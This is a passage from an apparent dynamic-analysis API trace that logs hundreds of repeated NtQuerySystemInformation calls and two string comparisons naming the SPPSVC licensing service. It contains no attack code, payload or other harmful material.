(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.320] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.329] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.337] NtQuerySystemInformation (SystemInformationClass=0xb9, 